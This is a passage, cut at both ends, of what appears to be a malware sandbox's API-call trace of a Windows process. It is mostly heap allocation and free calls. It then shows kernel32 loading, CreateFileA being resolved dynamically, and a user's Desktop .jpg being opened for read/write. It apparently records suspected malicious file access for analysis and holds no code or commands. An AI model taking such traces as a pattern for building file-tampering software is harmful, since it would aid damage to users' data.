Size=0x8) returned 0x7af4b8 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0031.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0031.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.168] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.169] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.170] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cb80 [0031.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cb80, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0031.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.171] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0031.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0031.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cb80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0031.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.171] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0031.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0031.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4a) returned 0x7f3630 [0031.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg", cchWideChar=74, lpMultiByteStr=0x7f3630, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg", lpUsedDefaultChar=0x0) returned 74 [0031.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0031.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.172] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\jjp_bfl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=74, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x94) returned 0x7c5448 [0031.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=74, lpWideCharStr=0x7c5448, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg") returned 74 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.173] RtlAllocateHeap 